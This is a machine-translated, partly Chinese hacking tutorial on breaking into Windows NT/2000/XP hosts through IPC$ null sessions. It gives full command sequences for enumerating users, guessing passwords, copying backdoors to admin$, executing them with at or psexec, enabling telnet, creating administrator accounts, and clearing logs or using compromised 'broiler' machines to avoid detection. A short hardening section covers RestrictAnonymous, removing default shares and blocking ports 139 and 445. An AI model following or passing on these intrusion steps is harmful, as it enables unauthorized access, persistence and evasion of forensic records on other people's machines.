Basic introduction
There are so many articles about ipc$ intrusion on the Internet, and the attack steps have even become a solidified mode, so no one wants to take out what has become a fixed form. Fiddling. But having said that, I think these articles are not explained in detail, and some of the content is even wrong, so that questions about ipc$ account for almost half of the discussion areas of major security forums, and these questions are often repeated. This has seriously affected the quality of the forum and learning efficiency, so I summarized this article, hoping to make the ipc$ part of the story as clear as possible.
Note: The various situations discussed in this article are defaulted in the win NT/2000/XP/win 7 environment, and win98 will not be included in this discussion.
Null connection is IPC connection without password and user name. Under Windows, it is realized by Net command. Enter empty connection net use \\IP address "password" /user:"user name" Prohibit empty connection Start-Settings-Control Panel-Administrative Tools-Services, just stop the server service in the service.
Function
IPC$(Internet Process Connection) is a resource that shares "named pipes". It is a named pipe that is open for inter-process communication. It provides trusted users Name and password, both parties of the connection can establish a secure channel and exchange encrypted data with this channel, thereby achieving access to remote computers. IPC$ is a new feature of NT/2000. It has a feature that only one connection can be established between two IPs at the same time. While NT/2000 provides the ipc$ function, it also opens the default sharing when the system is first installed, that is, all logical sharing (c$, d$, e$...) and the system directory winnt or windows (admin$) Share. All of these, Microsoft's original intention is to facilitate the management of administrators, but intentionally or unintentionally, leading to a reduction in system security.
Others
Usually we can always hear people talking about ipc$ loopholes, ipc$ loopholes, in fact, ipc$ is not a loophole in the real sense, I think the reason why some people are like this Said, it must refer to the'backdoor' that Microsoft installed itself: Null session. So what is an empty session?
Empty session
Establishing
Before introducing an empty session, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. The successful session will become a secure tunnel through which the two parties can communicate with each other. The general sequence of this process is as follows:< /p>
1) The session requester (client) sends a data packet to the session receiver (server) to request the establishment of a secure tunnel;
2) The server generates a random 64-digit number ( Implementation challenge) Send back to the client;
3) The client obtains the 64-digit number generated by the server, disrupts it with the password of the account that is trying to establish a session, and returns the result to the server (implementation response); < /p>
4) After the server accepts the response, it sends it to the local security authentication (LSA). The LSA verifies the response by using the user's correct password to confirm the identity of the requester. If the account of the requester is a local account of the server, the verification occurs locally; if the account requested is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and then sent to the client. The client uses this access token to connect to the resource on the server until the established session is terminated.
The above is a general process of establishing a secure session, but what about an empty session?
Null session is a session established with the server without trust (that is, the user name and password are not provided), but according to the WIN2000 access control model, the establishment of a null session also requires a token. However, the empty session is not authenticated by the user information during the establishment process, so this token does not contain user information. Therefore, this session cannot allow the system to send encrypted information, but this does not mean that the empty session token does not contain The security identifier SID (it identifies the user and the group to which it belongs). For an empty session, the SID of the token provided by the LSA is S-1-5-7, which is the SID of the empty session, and the user name is: ANONYMOUS LOGON (this The user name can be seen in the user list, but it cannot be found in the SAM database. It belongs to the built-in account of the system). This access token contains the following disguised groups:
Everyone
Network
Under the restriction of the security policy, this empty session will be authorized to access all the information that the above two groups have access to. So what can you do to establish an empty session?
Application
For NT, under the default security settings, with the help of empty connections, users and shares on the target host can be listed, shared with everyone's permission, and a small part of the registry can be accessed. There is not much use value; it has a smaller effect on 2000, because in Windows 2000 and later versions, only administrators and backup operators have the right to access the registry from the network by default, and it is inconvenient to implement, and tools are needed. .
From these we can see that this kind of untrusted session is not very useful, but from a complete ipc$ invasion, the empty session is an indispensable springboard, because we are from it You can get the user list, and most weak password scanning tools use this user list to guess the password. The successful export of the user list greatly increases the success rate of the guess. This alone is enough to explain the empty session. Security risks, so it is incorrect to say that empty conversations are useless. The following are some specific commands that can be used in an empty session:
1 First, we first establish an empty session (of course, this requires the target to open ipc$)
Command: net use( A space is required here, and the same is true for the following) \\ip\ipc$"" /user:"" (Note: the front quotation mark "" is an empty password, and the following user: "" quotation mark is an empty username)
Note: The above command includes four spaces, one space between net and use, one after use, and one space on the left and right of the password.
2 View the shared resources of the remote host
Command: net view \\ip
Explanation: The premise is that after an empty connection is established, you can use this command to view For the shared resources of the remote host, if it is opened for sharing, you can get the following results, but this command cannot display the default sharing.
Shared resources in \\*.*.*.*
Resource sharing name type usage comment
---------- -------------------------------------------------< /p>
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
The command completed successfully.
3 View the current time of the remote host
Command: net time \\ip
Explanation: Use this command to get the current time of a remote host.
4 Get a list of NetBIOS user names of the remote host (you need to open your own NBT)
Command: nbtstat -A ip
Use this command to get a remote The host's NetBIOS user name list, returns the following result:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
------------------------------------ ---------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H < ; 1C > GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered< /p>
INet~Services < 1C > GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00- 50-8B -9A -2D-37
The above is what we often do with empty sessions. It seems that we can get a lot of things, but we should pay attention to the fact that the operation of establishing IPC$ connection will be in Event Leave a record in the Log, regardless of whether you log in successfully or not. Alright, then let's take a look at the port used by ipc$?
About operation
Port used
First, let’s understand some basic knowledge:
1 SMB:(Server Message Block) Windows protocol Family, used for file printing and sharing services;
2 NBT: (NETBios Over TCP/IP) Use 137 (UDP) 138 (UDP) 139 (TCP) ports to realize NETBIOS network based on TCP/IP protocol Interconnected.
3 In WindowsNT, SMB is implemented based on NBT, that is, using port 139 (TCP); and in Windows2000, SMB can be implemented directly through port 445 in addition to being based on NBT.
With these basic knowledge, we can further discuss the port selection for accessing network shares:
For win2000 client (initiator):
1 If NBT is allowed to connect to the server, the client will try to access ports 139 and 445 at the same time. If port 445 responds, it will send a RST packet to port 139 to disconnect, and use port 455 for conversation. When port 445 does not respond, port 139 is used. If both ports do not respond, the session fails;
2 If NBT is forbidden to connect to the server, then the client will only try to access 445 port, if there is no response on 445 port, then the session fails.
For win2000 server:
1 If NBT is allowed, then UDP ports 137, 138, TCP ports 139, 445 will be opened (LISTENING );
2 If NBT is forbidden, then only port 445 is open.
The port selection of the ipc$ session we established also complies with the above principles. Obviously, if the remote server is not listening on port 139 or 445, the ipc$ session cannot be established.
Reasons for failure
The following are some common reasons for ipc$ connection failure:
1 IPC connection is a unique feature in Windows NT and above systems. Because it needs to use many DLL functions in Windows NT, it cannot run in Windows 9.x/Me system, that is to say, only nt/2000/xp can establish ipc$ connection with each other, and 98/me cannot establish ipc$ Connected;
2 If you want to successfully establish an ipc$ connection, you need the responder to enable ipc$ sharing, even if it is an empty connection, if the responder turns off ipc$ sharing, the connection will not be established ;
3 The connection initiator does not start Lanmanworkstation service (display name: Workstation): it provides network link and communication, without it the initiator cannot initiate a connection request;
4 response The Lanmanserver service (display name: Server) is not started by the party: it provides RPC support, file, printing, and named pipe sharing. ipc$ depends on this service. Without it, the host will not be able to respond to the initiator's connection request. Can initiate an ipc$ connection;
5 The responder does not start NetLogon, it supports the computer pass-through account login identity on the network (but this does not seem to be much);
6 Response The 139 and 445 ports of the party are not in the monitoring state or are blocked by the firewall;
7 The connection initiator has not opened the 139 and 445 ports;
8 The user name or password is wrong: if this happens Error, the system will give you an error message similar to "Unable to update the password" (obviously an empty session excludes this error);
9 Command input error: there may be more or less spaces, when the user When the name and password do not contain spaces, the double quotation marks on both sides can be omitted. If the password is empty, you can directly enter the two quotation marks "";
10 If the other party restarts the computer after the connection has been established , Then the ipc$ connection will be automatically disconnected, and the connection needs to be re-established.
In addition, you can also analyze the reason according to the returned error number:
Error number 5, access denied: It is very likely that the user you are using is not an administrator;
Error number 51, Windows cannot find the network path: there is a problem with the network;
Error number 53, the network path cannot be found: the ip address is wrong; the target is not turned on; the target lanmanserver service is not started; the target has Firewall (port filtering);
error number 67, network name cannot be found: your lanmanworkstation service is not started or the target has deleted ipc$;
error number 1219, provided credentials Conflict with an existing credential set: you have established an ipc$ with the other party, please delete and reconnect;
error number 1326, unknown user name or wrong password: the reason is obvious;
Error number 1792, trying to log in, but the network logon service is not started: the target NetLogon service is not started;
error number 2242, the user’s password has expired: the target has an account policy, mandatory periodic requirements Change the password.
Copy files
Although some friends have successfully established an ipc$ connection, they have encountered such and other troubles when copying. They cannot copy successfully, so the common reasons for copy failure What are there?
1. The other party does not open the shared folder
This type of error occurs the most, accounting for more than 50%. After the ipc$ connection is successfully established, many friends do blind copying without even knowing whether the other party has a shared folder. As a result, the copying fails and is very depressed. Therefore, I suggest that you use the command net view\\IP to check whether the shared folder you want to copy exists before copying (it is better to view with software), don’t think that there must be shared files if you can establish an ipc$ connection Folder exists.
2. Failed to copy to the default share
This kind of error is often made by everyone. There are mainly two small aspects:
1) Wrong thinking that it can The host that establishes the ipc$ connection must have the default sharing enabled, so immediately after the connection is established, copy files to the default sharing such as c$, d$, admin$, and once the other party does not enable the default sharing, the copy will fail. A successful ipc$ connection can only indicate that the other party has opened the ipc$ share, but it does not mean that the default share must exist. The ipc$ sharing and the default sharing are two different things. The ipc$ sharing is a named pipe, not an actual folder, but the default sharing is a real shared folder;
2) because of net view The \\IP command cannot display the default shared folder (because the default share is with $). Therefore, through this command, we cannot determine whether the other party has enabled the default sharing. Therefore, if the other party does not enable the default sharing, then all the actions to the default sharing The operation cannot be successful; (However, most scanning software can scan to the default shared directory while scanning for weak passwords, which can prevent such errors from occurring)
Key points: Please distinguish between ipc sharing, The difference between default sharing and common sharing: ipc sharing is a pipeline, not an actual shared folder; the default sharing is the folder opened by default during installation; the ordinary sharing is a shared folder that we can open by ourselves and can set permissions .
3. Insufficient user permissions, including four situations:
1) When the empty connection is copied to all shares (default share and common share), the permissions are not enough;
2) When copying to the default share, in the Win2000 Pro version, only members of the Administrators and Backup Operators groups can access these shared directories; in the Win2000 Server version, the Server Operatros group can also access these shared directories;
3) When copying to a common share, you must have the corresponding authority (that is, the access authority set by the other party’s administrator in advance);
4) The other party can prohibit external access to the share through the firewall or security software settings;< /p>
Note:
A. Don’t think that the administrator must have administrator rights. The administrator name can be changed.
B. The administrator can access the default share Folders, but may not be able to access ordinary shared folders, because the administrator can set access permissions for ordinary shared folders, and the administrator set the access permissions for the D drive to allow only users named xinxin to this folder For full access, even if you have administrator rights, you still cannot access the D drive. But the interesting thing is that if the other party turns on the default sharing of D$ at this time, then you can access D$, thus bypassing the permission restriction, and interested friends can do the test by themselves.
4. Killed by a firewall or on a LAN
There is another situation, that is, maybe your copy operation has been successful, but when it is running remotely, it is killed by the firewall. The file cannot be found; or you copied the Trojan to the host in the LAN, causing the connection to fail (this will not happen to the Trojan with the reverse connection). If you didn't think of this situation, you would think that there was a problem with the copy, but in fact your copy operation has been successful, but there was a problem at runtime.
Command restrictions
I originally wanted to talk about the reasons for the failure of remotely running programs with at, but considering that the success rate of at is not very high, there are many problems, so I won’t mention it here. It does (the more you mention it, the more people use it), but it is recommended that you use psexec.exe to run the program remotely. Suppose you want the remote machine to execute the local c:\xinxin.exe file, and the administrator is administrator, the password is Is 1234, then enter the following command:
psexec\\ip-u administrator -p 1234 -cc:\xinxin.exe
If an ipc connection has been established, then -u- p These two parameters are not needed, psexec.exe will automatically copy the file to the remote machine and run it.
I didn’t want to discuss the ipc$ in XP. I wanted to discuss it separately, but I saw that more and more friends were eager to ask why when encountering XP, most of the operations were very difficult. Difficult to succeed. I’ll just mention it here. In the default security options of xp, any remote access is only granted guest permissions. That is to say, even if you use an administrator account and password, the permissions you get are only Guest, so it’s a big deal. Part of the operation will fail due to insufficient permissions, and so far there is no good way to break through this limitation. So if you really get the xp administrator password, I suggest you avoid the ipc pipe as much as possible.
Share
The target's ipc$ cannot be opened easily, otherwise the world will be messed up. You need a shell with admin permissions, such as telnet, Trojan, cmd redirection, etc., and then execute it under the shell:
net share ipc$
Open the target's ipc$ share;< /p>
net share ipc$ /del
Close the target ipc$ sharing; if you want to open a shared folder for it, you can use:
net share xinxin =c:\
This will open its c drive as a shared folder named xinxin. (But I found that many people mistakenly believe that the command to open a shared folder is net share c$, and they give novices some pointers, which is really a misunderstanding). Again, these operations are only possible under the shell.
Completing the command
I have seen many tutorials that are very inaccurate. Some of the commands that require a shell to complete the commands are simply executed under the ipc$ connection, which is misleading Role. So let me summarize the commands that need to be completed in the shell:
1 Create a user to the remote host, activate the user, modify the user password, and join the management group must be completed in the shell;
< p>2 Open the ipc$ sharing of the remote host, which is shared by default. Common sharing operations need to be completed under the shell;3 Run/close the service of the remote host, which needs to be completed under the shell;
4 Starting/killing the process of the remote host also needs to be done under the shell (except in the case of software, such as pskill).
Commands that may be used in the invasion
For the completeness of this tutorial, I have listed some common commands in the ipc$ invasion, if you have mastered these commands , You can skip this part and see the following. Please pay attention to whether these commands are applicable to the local or remote. If they are only applicable to the local, you can only execute them to the remote host after obtaining the shell of the remote host (such as cmd, telnet, etc.).
1 Command to establish/delete ipc$ connection
1) Establish an empty connection:
net use \\127.0.0.1\ipc$"" /user :""
2) Establish a non-empty connection:
net use \\127.0.0.1\ipc$" password" /user:"user name"
3) Delete connection:
net use \\127.0.0.1\ipc$/del
2 Operation commands for remote host in ipc$ connection
1) View the shared resources of the remote host (the default share is not visible):
net view \\127.0.0.1
2) View the current time of the remote host:
net time \\127.0.0.1
3) Get the netbios username list of the remote host:
nbtstat -A 127.0.0.1
4 ) Map/delete remote share:
net use z:\\127.0.0.1\c
This command maps the shared resource named c to the local z drive
>net use z: /del
Delete the mapped z drive, analogous to other drives
5) Copy files to the remote host:
copy path \ File name\\IP\Shared directory name, such as:
copy c:\xinxin.exe\\127.0.0.1\c$ will copy xinxin.exe under c drive to the other party's c drive< /p>
Of course, you can also copy the files on the remote host to your own machine:
copy \\127.0.0.1\c$\xinxin.exec:\
6) Add a scheduled task remotely:
at \\IP time program name such as:
at \\127.0.0.011:00 xinxin.exe
Note: Try to use the 24-hour system for the time; if the program you intend to run is in the system default search path (such as system32/ ), you do not need to add the path, otherwise you must add the full path. At present, the at command has been abandoned. Use the schtasks command instead. You can use schtasks /? to query its usage.
3 Local commands
1) View the shared resources of the local host (you can see the local default share)
net share
2) Get the user list of the local host
net user
3) Display the account information of a local user
net user account name
4) Display the services currently started on the local host
net start
5) Start/stop local services
net start service name
net stop service name
6) Add an account locally
net user account name password/add
7) Activate disabled users
< p>net uesr account name/active:yes8) Join the administrator group
net localgroup administrators account name/add
It is obvious that although These are all local commands, but if you enter them in the shell of the remote host, for example, you enter the above commands after successful telnet, then these local inputs will act on the remote host.
4 Other commands
1) telnet
telnet IP port
telnet 127.0.0.0 23
2) Use opentelnet.exe to open the remote host's telnet
OpenTelnet.exe\\ip administrator account password NTLM authentication method port
OpenTelnet.exe\\127.0.0.1administrator " "1 90
However, this gadget needs to meet four requirements:
1) The target has enabled ipc$ sharing
2) You must have an administrator password And account
3) The target opens the RemoteRegistry service, and the user can change the ntlm authentication
4) Only valid for WIN2K/XP
3) Use psexec.exe To obtain a shell in one step, ipc pipeline support is required
psexec.exe \\IP-u administrator account -p password cmd
psexec.exe \\127.0.0.1-u administrator -p "" cmd
Comparing the past and present ipc$ intrusion
Since it is a comparison, then I will first write down the past ipc$ intrusion steps to everyone. They are all quite classic steps. :
[1]
C:\>net use \\127.0.0.1\ipc$"" /user:admintitrators
\\ Scan To establish a connection with the empty password
[2]
c:\>net view \\127.0.0.1
\\ View remote shared resources< /p>
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\ will be a one-time backdoor srv. Copy the exe to the other party’s system folder, provided that admin$ is enabled
[4]
C:\>net time \\127.0.0.1
\\ View the current time of the remote host
[5]
C:\>at \\127.0.0.1 time srv.exe
\\ Run srv.exe remotely with the at command, you need the other party to open'Task Sc' heduler' service
[6]
C:\>net time \\127.0.0.1
\\ Check the current time again to estimate srv.exe Whether it is already running, this step can be omitted
[7]
C:\>telnet 127.0.0.1 99
\\ Open a new window, use Telnet remote login to 127.0.0.1 to get a shell (do not understand what does the shell mean? Then you just think of it as the control right of the remote machine, the operation is like DOS), port 99 is the one-time backdoor port opened by srv.exe
[8]
C:\WINNT\system32>net start telnet
\\ We start the telnet service of the remote machine in the shell we just logged in. After all, srv.exe is a one-time backdoor, we need a long-term The backdoor is convenient for future access. If the other party’s telnet has been started, this step can be omitted
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$ \system32
\\ Pass ntlm.exe in the original window, ntlm.exe is used to change the telnet authentication
[10]
C:\WINNT\system32>ntlm.exe
\\ Run ntlm.exe in the shell window, and you will be able to telnet this host unblockedly in the future
[11 ]
C:\>telnet 127.0.0.1 23
\\ In a new window, telnet to 127.0.0.1, port 23 can be omitted, so we get a long-term backdoor
[12]
C:\WINNT\system32>net user account name password/add
C:\WINNT\system32>net uesr guest /active :yes
C:\WINNT\system32>net localgroup administrators account name/add
After \\telnet, you can create a new account, activate guest, and add any account to management Members, etc.
Okay, I seem to have returned to the ipc$ 2, 3 years ago. Everyone used ipc$ in this way. However, with the emergence of new tools, the above mentioned Some tools and commands are not commonly used, so let's take a look at an efficient and simple ipc$ intrusion.
[1] psexec.exe \\IP-u administrator account -p password cmd
\\ With this tool we can get the shell in one step
OpenTelnet.exe \\server administrator account password NTLM authentication method port
\\ Use it to conveniently change the telnet authentication method and port, which is convenient for us to log in
[2 ] There is no second step. After you use one step to get the shell, you can do anything. You can use winshell to install the backdoor, use ca for cloning, use 3389.vbe to open the terminal, and use win2kpass to record passwords. In short, good tools are not. Less, it's up to you, I won't say more.
Prevent intrusion
1 Prohibit enumeration of empty connections (this operation does not prevent the establishment of empty connections)
Run regedit and find the following primary key [HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Control\LSA] Change the key value of RestrictAnonymous = DWORD to: 1
If set to "1", an anonymous user can still connect to the IPC$ share, but cannot pass this connection Get the permission to enumerate SAM accounts and shared information; "2" is added in Windows 2000, and users who have not obtained anonymity rights will not be able to make ipc$ empty connections. The recommended setting is 1. If the primary key mentioned above does not exist, create a new one and change the key value. If you find it troublesome to change the registry, you can set this in the local security settings: In the local security settings-local policy-security options-'additional restrictions on anonymous connections'
2 prohibit default sharing
p>1) View local shared resources
Run -cmd- enter net share
2) Delete the share (the default share still exists after restarting)
< p>net share ipc$ /deletenet share admin$ /delete
net share c$ /delete
net share d$ /delete (if there is e,f, ……can continue to delete)
3) Stop the server service
net stop server /y (The server service will restart after restarting)
4) Prohibit automatic opening of the default share (this operation does not close the ipc$ share)
Run -regedit
server version and pro version: find the following primary key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Services\LanmanServer\Parameters] Change the value of AutoShareServer (DWORD) to: 00000000.
These two key values do not exist on the host by default. You need to add them manually. After modification, restart the machine to make the settings take effect.
3 Turn off ipc$ and the services that the default sharing depends on: server service
If you really want to turn off ipc$ sharing, then disable the server service:
Control Panel-Administrative Tools-Services-Find the server service (right click)-Properties-General-Startup Type-Select Disabled, then there may be a prompt saying: XXX service will also be closed whether to continue, because there are some minor issues The service depends on the server service, don't care about it.
4 Block 139 and 445 ports
Because there is no support for the above two ports, ipc$ cannot be established, so blocking 139 and 445 ports can also prevent ipc$ from intruding.
1) Port 139 can be blocked by disabling NBT
Local connection-TCP/IT properties-Advanced-WINS-select the option'Disable NETBIOS over TCP/IT'
p>2) Port 445 can be blocked by modifying the registry
Add a key value
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\ Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
Restart the machine after modification
Note: If the above two ports are blocked, you will not be able to use ipc$ to invade others.
3) Install a firewall for port filtering
6 Set complex passwords to prevent exhaustion of passwords through ipc$. I think this is the best way to enhance security awareness. It is much safer to keep patching.
Pipe
The ipc pipe was originally designed by Microsoft to facilitate the remote management of administrators, but in the eyes of the intruder, the host that opens the ipc pipe seems easier to succeed. Through the ipc pipeline, we can remotely call some system functions (most of them are implemented through tools, but corresponding permissions are required), which is often the key to the success or failure of an intrusion. If you don’t consider these, only from the aspect of file transfer, the ipc channel has given intruders great support, and has even become the most important means of transmission, so you can always see some friends on the major forums because they can’t call Open the ipc pipe of the target machine and cry out for help. Of course, we can't ignore the important role that permissions play in the ipc pipeline. You must have tasted the awkwardness of an empty session. Without permissions, we can't do anything about opening the channel. But once the intruder gains the administrator's authority, the double-edged sword of ipc pipe will show its hideous side.
Featured Questions and Answers
There are a lot of theoretical things mentioned above, but in practice you will encounter various problems, so in order to give everyone the greatest help, I have compiled some representative questions and answers in major security forums. Some of the answers are given by me, and some are replies on the forum. If you have any questions, you can come to me to discuss.
1. When an ipc$ intrusion is carried out, a record will be left in the server. Is there any way to prevent the server from discovering it?
Answer: It is certain to leave a record. You can delete it with the clear log program after you leave, or use a broiler to invade.
2. You can see why the following situation can be connected but not copied
net use \\***.***.***.***\ipc $"password" /user:"username"
Command succeeded
copy icmd.exe \\***.***.***.***\admin $
Cannot find the network path
The command is not successful
Answer: "Cannot find the network path" "Cannot find the network name" and so on The problem is mostly because the shared folder you want to copy to is not opened, so an error will occur during copying. You can try to find other shared folders.
3. If the other party has opened IPC$ and can establish an empty connection, but when opening the C and D drives, a password is required. I know that an empty connection does not have much permission, but there is no other way Is it?
Answer: It is recommended to use streamer or other scanning software to try to guess the password. If you can’t guess it, you can only give up. After all, the ability of empty connections is limited.
4. I have guessed the administrator's password, and I have successfully connected with ipc$, but net view \\ip found that it did not open the default share, what should I do?
Answer: First, correct one of your mistakes. You can’t see the default share with net view\\ip. You can try to copy the file to c$ and d$ to see if it doesn’t work. It means that he has turned off the default sharing, then you can use opentelnet.exe or psexec.exe, the usage is as above.
5.ipc$ After the connection is successful, I used the following command to create an account, but found that the account is on my own machine, what's the matter?
net uset ccbirds /add
Answer: The successful establishment of ipc$ only means that you have established a communication tunnel with the remote host. It does not mean that you have obtained a shell. After the shell (such as telnet), you can create an account on the remote machine, otherwise your operation will only be performed locally.
6. 我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制 0 个文件”,是不是对方有什么服务没开,我该怎么办?
答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。
7. 我用 Win98 能与对方建立 ipc$ 连接吗?
答:理论上不可以,要进行 ipc$ 的操作,建议用 win2000 ,用其他操作系统会带来许多不必要的麻烦。
8. 我用 net use\\ip\ipc$"" /user "" 成功的建立了一个空会话,但用 nbtstat -A IP 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的 NBT 没有打开, netstat 命令是建立在 NBT 之上的。
9. 我建立 ipc$ 连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突',怎么回事?
答:呵呵,这说明你已经与目标主机建立了 ipc$ 连接,两个主机间同时建立两个 ipc$ 连接是不允许的。
10. 我在映射的时候出现:
F:\>net use h:\\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。 What is going on here?
答:你也太粗心了吧,这说明你有一个 h 盘了,映射到没有的盘符吧!
11. 我建立了一个连接 f:\>net use \\*.*.*.*\ipc$"123" /user:"guest" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:\>net use h:\\*.*.*.*\c$
密码在\\*.*.*.*\c$无效。
请键入\\*.*.*.*\c$的密码 :
系统发生 5 错误。
拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射 C$ 这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。
12. 我用superscan扫到了一个开了 139 端口的主机,但为什么不能空连接呢?
答:你混淆了 ipc$ 与 139 的关系,能进行 ipc$ 连接的主机一定开了 139 或 445 端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭 ipc$ 共享 .
13. 我们局域网里的机器大多都是 xp ,我用流光扫描到几个 administrator 帐号口令是空,而且可以连接,但不能复制东西,说错误 5 。请问为什么?
答: xp 的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误 5 :权限不够。
14. 我用 net use \\192.168.0.2\ipc$"password" /user:"administrator" 成功,可是 net use i:\\192.168.0.2\c
出现请键入\\192.168.0.2的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?
答:虽然你具有管理员权限,但管理员在设置 c 盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许 administrator 访问,所以会出现上述问题。
15. 如果自己的机器禁止了 ipc$, 是不是还可以用 ipc$ 连接别的机器?如果禁止 server 服务呢?
答:禁止以上两项仍可以发起 ipc$ 连接,不过这种问题自己动手试验会更好。
16. 能告诉我下面的两个错误产生的原因吗?
c:\>net time\\61.225.*.*
系统发生 5 错误。
拒绝访问。
c:\>net view\\61.225.*.*
系统发生 5 错误。
拒绝访问。
答:起初遇到这个问题的时候我也很纳闷,错误 5 表示权限不够,可是连空会话的权限都可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了 ipc$ 连接,之后他又输入了上面那两个命令,随之发生了错误 5 。
17. 您看看这是怎么回事?
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。
答:答案很简单,你的命令错了,应该是 net time \\ip
没输入 ip 地址,当然找不到服务器。 view 的命令也应该有 ip 地址,即: net view\\ip